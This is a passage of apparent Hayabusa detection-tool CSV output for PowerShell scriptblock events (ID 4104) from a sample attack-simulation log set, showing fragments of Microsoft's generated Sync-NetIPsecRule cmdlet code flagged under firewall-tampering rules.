$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${Asso",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ciatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ciatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 